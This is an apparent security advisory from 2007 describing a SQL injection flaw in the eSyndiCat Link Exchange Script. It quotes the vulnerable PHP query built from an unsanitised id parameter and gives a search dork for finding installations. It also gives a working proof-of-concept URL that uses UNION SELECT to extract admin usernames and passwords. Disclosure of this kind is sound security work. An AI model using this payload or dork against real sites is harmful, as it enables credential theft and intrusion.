eSyndiCat Link Exchange Script 2005-2006 SQL Injection Vulnerability

2007-12-25 00:00:00


--------------------------------------------------------------
eSyndiCat Link Exchange Script - Remote SQL Injection Advisory
--------------------------------------------------------------

author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com

link.....: http://www.esyndicat.com/
dork.....: "© 2005-2006 Powered by eSyndiCat Link Exchange Script"
details..: works with magic_quotes_gpc = off

[-] Vulnerable code in /suggest-link.php :

30. /** gets information about current category **/
31. $category =& $gDirDb->getCategoryById($_GET['id']);
32. $gDirSmarty->assign_by_ref('category', $category);

[-] getCategoryById function defined in /classes/Dir.php :

323. function getCategoryById($aCategory)
325. {
326. $sql = "SELECT * FROM `{$this->mPrefix}categories` ";
327. $sql .= "WHERE `id` = '{$aCategory}'";
328.
329. return $this->mDb->getRow($sql);
330. }


[*] An attacker can break database through browser! P.o.C. :

http://[host]/[path]/suggest-link.php?id=-1'/**/UNION/**/SELECT/**/1,1,1,password,1,1,1,1,username,1,1/**/FROM/**/dir_admins/*

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.